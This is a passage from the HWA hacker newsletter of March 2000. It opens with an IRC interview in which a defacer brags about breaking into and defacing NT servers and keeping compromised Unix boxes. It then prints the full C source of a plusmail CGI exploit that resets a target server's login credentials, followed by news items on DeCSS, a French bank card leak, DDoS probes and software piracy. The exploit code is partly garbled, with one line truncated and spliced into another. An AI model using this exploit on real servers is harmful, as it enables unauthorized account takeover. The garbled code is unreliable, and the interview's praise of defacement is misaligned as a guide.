[15:41] damn that was the most interesting too
[15:41] :)
[15:41] :)
[15:43] well i suppose this interview gives me the perfect opportunity to address some of the misleading comments written by sect0r in the last issue of hwa
[15:43] I was about to approach that
[15:43] initially sect0r said he and you were 'ok' after the defacement log incident
[15:44] yeah i thought we were ok too
[15:44] "He" claims i'm a wannabe with no skills,
[15:44] this is funny since it was only the other day he asked me
[15:44] to deface a web site for him
[15:45] hrm
[15:45] "He" claims he could have redefaced my stuff easily
[15:45] this is funny again since he had to come and ask me to do his chores.
[15:45] yeah in the interview he said
[15:45] [20:03] i had someone akicked from #hackers on dalnet,
[15:45] the kid retaliated, what can i say?
[15:45] And even if he did know how to redeface my stuff he wouldn't have gotten
[15:45] very far since I patched all the boxes I hacked.
[15:45] [20:04] that would be blazinweed, he is basically a
[15:45] wannabe with no skills to speak of.
[15:45] [20:04] i would have re-defaced his stuff easily
[15:45] (nt boxen), but i'm not down with that anymore.
[15:45] ...
[15:45] He also highlights the fact
[15:45] that they were only NT boxes that were defaced well i'd like to respond to this by saying i only deface NT boxes because i have no use for them but the unix boxes I keep btw he runs windows :D
[15:45] good point
[15:46] I'd also like to say a few things about the plusmail exploit
[15:46] that he and ytcracker talked about. I've never heard so much bull ever.
[15:46] the Hole was found by Herf (of wkD which is my group also)
[15:46] but people take notice of defacements because they are 'public' and summarily judge people in the 'scene' by their web 'hacks'
[15:46] and all it required was a simple html file that you loaded in your browser
[15:46] which then allowed you to bypass the login screen on dumb servers running plusmail. btw the scanner was written by ytcracker and it was useless anyway since next to no servers run the vulnerable package and the ones that do have long since patched it.
[15:47] This is the reason you didn't see it get a slot at securityfocus.
[15:47] * plusmail cgi exploit
[15:47] - missnglnk
[15:47] greets: herf, ytcracker, mosthated, tino
[15:47] that one? or a variant
[15:47] variant
[15:47] ok
[15:47] thats on packetstorm btw
[15:47] I was one of the first people to have it
[15:48] http://packetstorm.securify.com/0001-exploits/plusmail.c
[15:48] hrm
[15:49] have you confronted sect0r about his comments?
[15:49] if so what happened
[15:49] if not why not
[15:49] :)
[15:49] he left before i could
[15:50] someone found all his personal info
[15:50] nod I'm aware of that
[15:50] and he is gone to hide
[15:52] anything else you'd like to say? there isn't that much we haven't covered really
[15:53] we don't need to drag it out
[15:53] :)
[15:53] :D
[15:53] I think i've readdressed the balance
[15:53] do you guys have a site for instance?
[15:53] website that is
[15:53] yeah but its private
[15:54] if you think of anything to add lemme know
[15:54] ok
[15:54] my email is cruciphux@dok.org
[15:54] thanks
[15:54] if i'm not online
[15:54] tnx
[15:54] -end-
Session Close: Sun Mar 19 15:55:19 2000

@HWA

07.0 plusmail cgi exploit
~~~~~~~~~~~~~~~~~~~~

/*
 * plusmail cgi exploit - missnglnk
 * greets: herf, ytcracker, mosthated, tino
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

extern int errno;

int main(int argc, char **argv)
{
    int argswitch, tport = 80, sockfd, plen, cltlen, lport = 4040;
    char *target, tmpdata[32768], *password = "default",
         *username = "jackdidntsetone", pdata[1024], *errcode, *tmpline,
         *firstline, clntfd, origdata[32768], htmldata[32768];
    struct sockaddr_in rmt, srv, clt;
    struct hostent *he;
    unsigned long ip;

    if (argc < 5) {
        printf("plusmail cgi exploit by missnglnk\n");
        printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
        return -1;
    }

    while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
        switch (argswitch) {
        case 'h':
            if (strlen(optarg) > MAXHOSTNAMELEN) {
                printf("ERROR: Target hostname too long.\n");
                return -1;
            }
            target = optarg;
            break;
        case 'p':
            tport = atoi(optarg);
            break;
        case 'n':
            if (strlen(optarg) > 8) {
                printf("Password length greater than 8 characters.\n");
                return -1;
            }
            password = optarg;
            break;
        case 'u':
            if (strlen(optarg) > 8) {
                printf("Username length greater than 8 characters.\n");
                return -1;
            }
            username = optarg;
            break;
        case 'l':
            lport = atoi(optarg);
            break;
        case '?':
        default:
            printf("plusmail cgi exploit by missnglnk\n");
            printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
            return -1;
            break;
        }
    }
    argc -= optind;
    argv += optind;

    bzero(&rmt, sizeof(rmt));
    bzero(&srv, sizeof(srv));
    bzero(&clt, sizeof(clt));
    bzero(tmpdata, sizeof(tmpdata));
    cltlen = sizeof(clt);

    if ((he = gethostbyname(target)) != NULL) {
        ip = *(unsigned long *) he->h_addr;
    } else if ((ip = inet_addr(target)) == NULL) {
        perror("Error resolving target");
        return -1;
    }

    rmt.sin_family = AF_INET;
    rmt.sin_addr.s_addr = ip;
    rmt.sin_port = htons(tport);

    srv.sin_family = AF_INET;
    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons(lport);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("Error creating socket");
        return -1;
    }
    if (connect(sockfd, (struct sockaddr *) &rmt, sizeof(rmt)) < 0) {
        perror("Error connecting");
        return -1;
    }

    snprintf(pdata, sizeof(pdata),
             "username=%s&password=%s&password1=%s&new_login=missnglnk",
             username, password, password);
    plen = strlen(pdata);

    snprintf(tmpdata, sizeof(tmpdata),
             "POST /cgi-bin/plusmail HTTP/1.0\n"
             "Referer: http://www.pure-security.net\n"
             "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n"
             "Host: %s\n"
             "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n"
             "Accept-Encoding: gzip\n"
             "Accept-Language: en\n"
             "Accept-Charset: isp-8859-1,*,utf-8\n"
             "Content-type: application/x-www-form-urlencoded\n"
             "Content-length: %d\n"
             "\n%s\n", target, plen, pdata);

    if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) {
        perror("Error writing data");
        return -1;
    }
    bzero(tmpdata, sizeof(tmpdata));

    while (read(sockfd, tmpdata, sizeof(tmpdata)) != 0) {
        strncpy(origdata, tmpdata, sizeof(origdata));
        firstline = strtok(tmpdata, "\n");
        bzero(tmpdata, sizeof(tmpdata));
        if ((errcode = strstr(firstline, "404")) != NULL) {
            printf("plusmail.cgi aint here buddy.\n");
            return -1;
        }
        for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) {
            if ((errcode = strstr(tmpline, "
\n", htmldata, target);
                snprintf(htmldata, sizeof(htmldata), "%s\n", htmldata, target);
            } else {
                // sprintf(htmldata, "%s%s\n", htmldata, tmpline);
                snprintf(htmldata, sizeof(htmldata), "%s%s\n", htmldata, tmpline);
            }
        }
    }

    if (close(sockfd) < 0) {
        perror("Error closing socket");
        return -1;
    }

    strncat(htmldata, "\n
<missnglnk>\0", sizeof(htmldata));

    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("Error creating socket");
        return -1;
    }
    printf("waiting on port %d...", lport);
    if (bind(sockfd, (struct sockaddr *) &srv, sizeof(srv)) < 0) {
        perror("Error binding to socket");
        return -1;
    }
    if (listen(sockfd, 0) < 0) {
        perror("Error setting backlog");
        return -1;
    }
    if ((clntfd = accept(sockfd, (struct sockaddr *) &clt, &cltlen)) < 0) {
        perror("Error accepting connection");
        return -1;
    }
    printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));
    if (!write(clntfd, htmldata, sizeof(htmldata))) {
        perror("Error writing data");
        return -1;
    }
    if (close(clntfd) < 0) {
        perror("Error closing socket");
        return -1;
    }
    printf("\n%s\n", htmldata);
    return 0;
}

@HWA

08.0 2600 activism against the MPAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.2600.com/
http://www.2600.com/news/2000/0130.html

February 2, 2000

FOR IMMEDIATE RELEASE

DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES

Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of websites. Lawsuits have been filed against hundreds of people, as well as an Internet Service Provider and a magazine, for having information the MPAA wants to keep secret.

The controversy centers around a computer program known as DeCSS, thought to be written by a 16 year old in Norway. The program defeats the encryption scheme used by DVD's which prohibits them from being viewed on non-approved machines or computers. It also enables DVD's from one country to be played in another, contrary to the wishes of the movie industry. It does NOT facilitate DVD piracy - in fact, copying DVD's has been possible since their introduction years ago.
In its press releases on the subject, the MPAA has claimed that this is a piracy issue and they have subsequently succeeded in getting injunctions against a number of sites that had posted the program in the interests of free speech. This is in effect a lawsuit against the entire Internet community by extremely powerful corporate interests.

The lawsuit and the various actions being planned promise to be a real showdown between two increasingly disparate sides in the technological age. The consequences of losing this case are so serious that civil libertarians, professors, lawyers, and a wide variety of others have already stepped forward to help out.

Friday's action will be coordinated in 74 cities throughout North America and 26 cities in other parts of the world. Leafletting will take place outside theaters and video stores in these cities - all of which participate in a monthly "2600" gathering. 2600 Magazine has been named in two lawsuits regarding the DeCSS program and has joined with the growing number of people who will fight these actions by the MPAA until the end.

The lawsuit has been filed by the Motion Picture Association of America, Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and Time Warner Entertainment.

Contact: Emmanuel Goldstein (631) 751-2600 ext. 0

leaflet campaign:
~~~~~~~~~~~~~~~~~

CALL TO ACTION
01/30/00

Thousands of copies of the flyer have already been distributed at movie theaters worldwide. Versions are also being made in different languages. The next step will involve a massive action this Friday, February 4, 2000. We call on all 2600 meetings held around the world on that day to head to the local theaters and spread the word of this travesty of justice by handing out as many flyers as possible.

Everyone is invited to show up and participate, bring your friends, tell your local Linux User Group, spread the news to any organization you're part of, and join us in advocating justice. We find that once people are made aware of the facts of the case, they become as outraged as we have.

TIPS FOR HANDING OUT FLYERS

First, make sure you make the flyers distinctive by printing on colored paper if at all possible. The quickest way to do this is to go to a copy shop. Get several hundred at the very least - you WILL go through them quickly. Make sure you can print more if you need them.

Familiarize yourself with the facts of the case as presented on www.opendvd.org. It's important to be able to answer questions of people who are interested in learning more. Remember, this is NOT about DVD piracy - that is how the movie industry is trying to portray this case. The issue here is CONTROL of players - whether you have the right to play DVD's on the computer of your choice and whether you should be able to see DVD's from other countries. As well as our freedom to continue reporting on the events, developments and discoveries of the hacker community, in a full and accurate manner.

We find that people respond well to "Protect Your Rights" as a catch phrase to get them to take the flyer. Let us know if others work for you.

Be courteous to the people passing by - don't block their path and, if they ignore you or even make a snide remark, don't heckle them. We find that the vast majority of people are polite and interested in what you have to say. You'll find that some will even come up to you asking for more flyers!

Have a set of master copies (printed on white paper) for others to make copies of their own and hand out in other places.

If you are asked to leave by theater management, cooperate and ask them where they would like you to stand. They can't force you to leave the area, only the part that is their property.
You can still successfully hand out material to everyone coming and going by positioning yourself in neighboring areas or even in the parking lot. If things become unpleasant, simply head to another theater in a different part of town. (If you run out of theaters, you can always fall back on video stores.) We find that 90% of such confrontations can be averted by befriending security guards and making it clear that you don't intend to be disruptive.

@HWA

09.0 Microsoft sends magazine full versions of Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by TRDonJuan (Translated from German)

http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html

Win 2000 free on CD

Microsoft has inadvertently given away 100,000 copies of Windows 2000, worth around 33 million dollars, to private users. As the Spanish news service Brujula.com reports, Microsoft actually intended to put the 120-day limited version of the operating system on the cover CDs that accompanied around 100,000 copies of the Spanish PC-WELT sister magazine "PC World".

It later turned out, however, that the software was a version with no time limit, including a registration code. As a result, 100,000 installations of Windows 2000 are in circulation without a license. And at a selling price of 330 dollars per copy, Microsoft may have suffered a financial loss of 33 million dollars.

Who caused the error has not yet been officially established. Insiders assume, however, that it was not the magazine but Microsoft itself that was responsible for the mishap. Some even whisper that Microsoft deliberately put the full version on the CDs to drive up Windows 2000 sales figures, and then declared the whole thing an accident: because of the monopoly position the software giant is accused of holding, it could not officially give the operating system away. In any case, the issue of PC World Spain that carried the CD-ROM set a sales record.

(PC-WELT, 16.03.2000, sp)

@HWA

10.0 HNN:Mar 13th:Mexican Rebels Breached Pentagon Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

According to Arthur L. Money, the chief information officer of the US Defense Department, Mexican Zapatista guerrillas managed to breach the online security systems of some Pentagon computers in 1998. Money said that the intruders used systems from the Frankfurt Stock Exchange to launch their attacks.

Agence France-Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html

(Sorry: 404 or expired story link)

@HWA

11.0 HNN:Mar 13th:Online Guerrilla War Rages In Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Online warez groups fighting amongst each other is now considered guerrilla warfare by authorities in Brazil.
According to the daily O Globo the Brazilian Hacker Organization (OHB) and the Anti-OHB have been trading insults via web defacements for some time. The Sao Paulo Civil Police Cybercrime Unit is also following attacks by three other active organizations: Hatted Copr, InfernBr and Crime Boys.

EFE via COMTEX - via Northern Light
http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc

(Pay to play document sorry ... - Ed)

@HWA

12.0 HNN:Mar 13th:French Bank Card Algorithm Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by alan.hop

Serge Humpich was sentenced to a ten month suspended sentence after notifying the French bank, Cartes Bancaires, that its bank cards were vulnerable to fraud. Now the secret that Humpich discovered has been released to the Internet. Bank officials say that the potential for fraud or fake cards is small while security experts fear that the underground will flood the market with fake cards within weeks.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html

Friday March 10 3:07 PM ET

Card Alert for French Banks

By Catherine Bremer

PARIS (Reuters) - France braced for a wave of petty fraud after officials admitted on Friday that a formula posted on the Internet showed how to forge smart payment cards.

But Cartes Bancaires, the French interbank group whose card system is affected, said there was no danger that bank accounts would be emptied.

Cards made with the formula might be used to buy train tickets or pay parking meters or toll booths although there was no evidence this had actually happened, Cartes Bancaires spokesman Herve de Lacotte told Reuters.

``For the first time in 10 years, a lock has been sprung,'' he said. ``But springing a lock will not necessarily open the door and let you in. There is a theoretical risk of fraud but the problem concerns banks, not consumers or shops.''

Despite claims to the contrary, Lacotte said, false cards made with the code could not be used in cash dispensers, to make shop purchases or for expensive goods.

Newspapers leaped on the story, quoting experts as saying the complex 96-digit code could be used to forge three in four of France's 34 million bank cards. Headlines like ``Chip card secret out'' left anyone with a bank card wondering whether their money was safe.

``Consumers have been paying for bank cards that aren't even secure. They've been cheated and lied to,'' said Eric April, Secretary-General of the AFOC consumer group.

Lacotte said the scare stories were over the top and the Bank of France accused the press of ``exaggerating the risk.''

``Even if certain clues relating to this algorithm have been made public... other security measures exist enabling strong limits on the use that can be made of this information,'' the French central bank said in a statement.

Cards issued since last autumn had added security which meant the pirate formula would not work for them, he added. SCSSI, the government body in charge of information security systems, urged banks to replace older cards with updated ones.

The card formula was posted anonymously on an Internet chat site last weekend. It was actually discovered three years ago by computer whizz kid Serge Humpich, who denies using it or circulating it but has been given a 10-month suspended prison sentence for cracking the banks' secret.

Now that it is public, Humpich says, pirates could buy a chip card kit for around $370 and be turning out false cards within weeks.

``A few weeks from now dozens of false cards are going to appear,'' he told Liberation.
@HWA 13.0 HNN:Mar 13th:Still No Suspects in DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Investigators are still sifting through mountains of log files but are having a rough time tracing the recent denial of service attacks against online giants Yahoo, ZD Net, CNN, and others. Officials still do not have any suspects and hope that more traditional methods will allow them to locate the culprit(s). San Jose Mercury News http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm Posted at 8:28 p.m. PST Thursday, March 9, 2000 No suspects in cyberattacks Investigators try to track down origin of last month's assaults BY DAVID L. WILSON Mercury News Washington Bureau WASHINGTON -- Federal authorities are continuing to investigate last month's series of attacks on commercial Internet sites, but sources close to the investigation say they have no suspects yet. Investigators are sifting through mountains of data, trying to track the attacks back to their origin using logs from the computers involved, but they concede that building a case using such methods may be difficult, if not impossible. Some believe that a break in case is more likely to come from more traditional methods. ``Often what you see in a cold case is a lead coming from someone who is in custody on an unrelated minor charge who offers information in return for a get-out-of-jail-free card,'' said one person with ties to the investigation. ``If somebody brags that he was behind this, eventually somebody else will roll over on him.'' Often, however, the braggarts are blowing smoke. For instance, a 17-year-old who goes by the moniker ``Coolio'' hinted in online chats that he was behind at least some of the attacks. But federal authorities say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H., was involved. 
However, Wednesday Moran was charged with two counts of unauthorized access to a computer system in connection with vandalism to the Los Angeles Police Department Web site DARE.com. In last month's attacks on popular Web sites such as Yahoo, eBay and CNN, suspects used a specialized technique known as a distributed denial of service attack. The technique depends on stealth software that has been secretly installed on hundreds of computers connected to the Internet. At a given signal, the programs attack a targeted Web site, flooding it with so much data that normal business is impossible. Investigators are using log files from the computers infected with the stealth software, hoping to track the trail back to the individual who installed the programs, but they have been unsuccessful so far. The difficulties investigators face were summed up in a 60-page report the federal government released Thursday. In a news conference discussing the report, Attorney General Janet Reno said law enforcement faces a number of challenges in cyberspace. ``These challenges include the inability to trace criminals who hide their identities online, difficulty in finding criminals who might be located in other jurisdictions, the need for better coordination among law enforcement agencies, and the need for trained personnel at all levels of law enforcement,'' Reno told reporters. The report generally said that existing laws could deal with crimes in cyberspace. In addition, while highlighting advantages criminals can gain from anonymity on the Internet, the report stressed that anonymity is both important and useful for average citizens. It suggested that any proposed changes in the availability and use of anonymity must be considered very carefully. Despite the report's measured tone, some groups feared a loss of privacy for individuals who could find their every movement in cyberspace tracked if they couldn't maintain anonymity. 
The American Civil Liberties Union blasted the report in a letter to Reno.

``An end to Internet anonymity would chill free expression in cyberspace,'' the letter declared. ``However, the report treats the anonymity of Internet users as a `thorny issue' rather than a constitutional right.''

Administration officials said the report was merely a starting point for an examination of security in cyberspace, and that the government was fully committed to maintaining privacy for Internet users.

Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com

@HWA

14.0 HNN:Mar 13th:Japanese Pirates Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

In a report released on March 10th, the Associated Computer Software Copyright Society (ACCS) disclosed two recent cases of piracy involving Internet bulletin boards. A Hokkaido University student living in Sapporo was arrested for selling as many as 30 illegal copies of Microsoft's Office 2000 Professional and other software. He charged a total of 500,000 yen (US$4,693.51) for the CDR copies. A 24-year-old worker living in Takasaki, Gunma prefecture was also recently arrested for advertising and selling illegal software via an Internet bulletin board. He sold software to 20 people for 100,000 yen (US$938.70). He said that he began selling pirated software after he purchased some in the same way.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759

Pirated Software Sales Rampant on Internet Bulletin Board

March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent to which Internet bulletin boards are being used in Japan to sell pirated software.

The Associated Computer Software Copyright Society (ACCS) disclosed the extent of the situation on March 10. In just the last 10 days, two cases of copyright violation have been brought to light by the Metropolitan Police Agency and the Aichi Prefecture Police.

On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo District Public Prosecutors Office regarding the activities of a 22-year-old Hokkaido University student living in Sapporo. The student was using an electronic bulletin board to advertise the sale of pirated software and was accepting orders via e-mail. The items included Microsoft's Office 2000 Professional as well as other office and game software copied to CD-R disks without the copyright holders' permission.

Between February and October 1999, the student reportedly sold illegally copied software to some 30 individuals nationwide for a total of about 500,000 yen. (106.53 yen = US$1)

The other incident, uncovered by the high-tech crime unit of the Aichi Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma prefecture. A report on the suspect was submitted to the Nagoya District Public Prosecutors Office on March 1.

Like the Sapporo student, the suspect is accused of using a bulletin board operated by a leading Internet service provider to advertise the sale of pirated software and accept online orders. The accused is believed to have sold the software to 20 people during the course of about one month, generating some 100,000 yen in sales. He reportedly confessed that he began selling pirated software after buying it in a similar manner himself.

(BizTech News Dept.)

@HWA

15.0 HNN:Mar 13th:Online Handles Impose Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Are the handles of online hooligans chosen in an attempt to impose fear? Matt Richtel of the NY Times attempts to explore the meanings of some of the more glamorous handles of the online world. (Too bad he completely misses the personal privacy angle. And what about entertainers like Sting, Madonna, John Cougar, or Prince?)

NY Times
http://www.nytimes.com/library/review/031200hacker-handles-review.html

(Pay to play url... sorry -Ed)

@HWA

16.0 HNN:Mar 13th:Vendors Still Making Insecure Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

At a recent congressional panel examining the threat to federal and private-sector computer networks, cyber security experts blamed software manufacturers for failing to improve the security features of most consumer software. (People in the underground have been saying this for years.)

Reuters - via Excite
http://news.excite.com/news/r/000309/15/net-tech-hacker

(Server: We're sorry, but this story is not currently available - Ed)

@HWA

17.0 HNN:Mar 14th:Smart Card Inventor Issues Challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acoplayse

Roland Moreno, inventor of the smart card, whose cards have slashed the fraud rate in France by 90 percent in 10 years, rejected claims that an algorithm posted on a Web chat site last week could bypass the cards' safeguards. He is so confident of his product that he is offering a million francs ($148,100) to anyone who could prove that they could read a bank's confidential code from the card. Moreno went on to claim that "chip cards are an impenetrable data system." (So impenetrable that Serge Humpich recently received a 10 month suspended sentence for defeating the system.)

Reuters
http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221

From above url; "Boston conventions threaten biotech food fight"... (Appears to be incorrectly linked .. not having much luck following up articles this week :/ sorree .. - Ed)

@HWA

18.0 HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki

In the past two months the Motion Picture Association of America has continued to harass and intimidate Internet users all over the world. Letters have been sent, threats have been levied, ISPs have crumbled, people have been fired from their jobs and worse. The fight is not over.

2600
http://www.2600.com/news/2000/0312.html

Open DVD
http://www.opendvd.org/

@HWA

19.0 HNN:Mar 14th:Tracking Down Coolio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Carlos

Log file analysis and a search engine: those were the most complicated tools needed to track down Coolio (Dennis Moran). Coolio was charged last week with defacing the Dare.org web site. (And this is what the FBI wants all that extra money for?)

Associated Press - via ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html

On the Trail of a Hacker

Court Papers Reveal How Cyber Gumshoe Tracked Teen

[Photo caption: Dennis Moran, 17, who goes by the name "Coolio" on the Internet, talks with reporters March 8, near his Wolfeboro, N.H., home after being questioned by the FBI about crippling attacks on major Web sites in February. (Ken Williams/Concord Monitor/AP Photo)
http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg]

The Associated Press

W O L F E B O R O, N.H., March 13 -- Recently released court records explain how authorities traced the hacking attack on a popular anti-drug Web site to a Wolfeboro teenager.

Dennis Moran, 17, was charged last week with hacking into the Web site of DARE.org and defacing it with pro-drug abuse slogans and images. He has acknowledged he vandalized the Los Angeles-based site and two others, but said he was only joking when he claimed responsibility for the attacks that crippled Yahoo, eBay and other major sites last month.

Court records released Friday show police began investigating Moran after noticing his Internet nickname, Coolio, on the defaced DARE.org site in November. At the bottom of the Web site were the messages "Coolio is k-r4d and so are drugs" and "Craftily owned by Coolio :D."
Searching in Cyberspace

Los Angeles Police Detective Michael Brausman used a search engine to find a Web page that included an e-mail address for Coolio@k-r4d.com. He traced the address to another site that included a directory labeled Coolio. Inside the directory was one of the images posted on the DARE site.

By late December, the detective had contacted the owner of an Arizona-based server who confirmed he had e-mail messages related to the Coolio directory. A search of the server's logs showed someone using the e-mail address coolio@k-r4d.com had sent messages that included Moran's name, address and phone number.

In one message, Moran inquired about registering cool.io as an Internet domain name. "If there's any way I could buy the domain for this, please email me pricing and information. Thanks, Dennis Moran," he wrote.

Brausman called Wolfeboro police Dec. 30. Investigators interviewed Moran on Feb. 17.

Moran faces two state charges of unauthorized access to a computer system. Each felony is punishable by up to 15 years in prison and a $4,000 fine.

Although Moran also was questioned by the FBI about several denial of service attacks on major commercial sites, including Yahoo.com and eBay.com, no charges have been filed in those cases. Investigators said they were seeking someone using the Internet signer Coolio in those attacks, but also said the name is used by many people online.

@HWA

20.0 HNN:Mar 14th: DOJ Launches Cybercrime Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The US Department of Justice has officially launched a cybercrime web site defining computer crime and describing how to report it. The site also includes the department's latest thinking on privacy vs. policing on the Internet as well as computer search and seizure guidelines.

Associated Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html

(Sorry dead link ... -Ed :( )

Cybercrime.gov
http://www.cybercrime.gov/

@HWA

21.0 HNN:Mar 14th: China Relaxes Crypto Rules
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acoplayse

After pressure from the US-China Business Council, Chinese authorities have agreed to "clarify" encryption regulations that were published in October last year. The State Encryption Management Commission (SEMC), which reports to the Ministry of State Security, has said that only hardware or software for which encryption is a core function will be limited by the regulations. Products that contain encryption as a secondary function will no longer be restricted. This includes browsers, consumer electronics and other items.

Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C&live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading=information%20technology&_ref=526610871

China softens rules on encryption

By James Kynge - 13 Mar 2000 22:06GMT

China has backed away from sweeping restrictions on the use and sale of foreign encryption technology that would have wreaked havoc on the use of foreign software, mobile phones, e-mail and other communications applications.

The US-China Business Council, which led a lobbying effort that united several national chambers of commerce in Beijing, said on Monday that Chinese authorities had agreed to "clarify" encryption regulations published in October last year.

The main sense of the clarification was that only hardware or software for which encryption is a core function will be limited by the regulations of the State Encryption Management Commission (SEMC), a body that reports to China's intelligence agency, the Ministry of State Security.

This means that mobile phone handsets, Windows software, browser software and other applications that contain encryption as an ancillary function will not now be restricted.
Windows 2000, Microsoft Corp's newest operating system, which is set to be launched in China on March 20, was given approval for sale this month by authorities, prefiguring the relaxation in SEMC's rules.

It was not immediately clear what types of products would fall under the definition of having encryption as a core function.

Under the SEMC's original restrictions, all businesses and individuals would have had to register with the government any products containing encryption technology. They then would have had to apply for permission to use the goods.

But a clarification letter issued by the SEMC allayed fears the government would gain access to corporate secrets carried in encoded communications by requiring companies to hand over their encryption source codes.

Business travellers carrying laptops with ordinary software, even if it contains some encryption capabilities, are not required to register, the US-China Business Council quoted the SEMC as saying in a verbal clarification of the regulations.

@HWA

22.0 HNN:Mar 14th:Stallman on UCITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

The Uniform Computer Information Transaction Act will threaten the existence of free software if passed. Richard Stallman, the founder of the Free Software Foundation, has spoken out vehemently about this legislation and continues to do so.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html

Interview: GNU guru Richard Stallman

The president of the Free Software Foundation and founder of the free-software movement speaks out against UCITA.

By Robert Lemos, ZDNet News
March 12, 2000 3:44 PM PT

When Richard Stallman founded the GNU (or Gnu's Not Unix) Project in 1984, his aim was to create Unix-compatible tools that were free. Sixteen years later, GNU software is a critical part of most Unix systems and forms the basis -- along with Linus Torvalds' Linux kernel -- of all Linux systems.
With the proposed Uniform Computer Information Transaction Act (UCITA) threatening the free-software movement, ZDNet News Senior Editor Robert Lemos caught up with Stallman, president of the Free Software Foundation, in India.

ZDNet: What will be the effect of UCITA on the free software movement?

Stallman: UCITA would make it harder for us to avoid liability for bugs that turn up in the free software we develop -- while giving proprietary software developers a very easy way to avoid all liability for their products, even for faults that they know about in advance. This is grossly unfair.

UCITA would also give proprietary software developers a way to prohibit reverse engineering. They could then promulgate secret formats for distributing and storing data and stop us from implementing free software to handle those formats. We would be unable to provide you with software to access your own data.

ZDNet: What will be the effect on GNU development? What about GNU/Linux?

Stallman: I don't expect UCITA to have any immediate effect on our software development. But in the long term we will probably have trouble making our software handle the secret data formats and support new hardware whose specifications are secret. Microsoft already said they plan to use secret formats and protocols to block the development of (GNU/) Linux. The format of Word is already a secret, and it is only through reverse engineering that people can figure out anything about it.

ZDNet: Will software be worse because of UCITA?

Stallman: That is the wrong question. The right question is how will users of software be worse off because of UCITA? I've already explained the problems free software will face. We will face additional obstacles to doing a good job. For non-free software, developers will not face additional obstacles, but they will be able to restrict the users in onerous ways. So even if the software is unchanged, the users will be worse off.
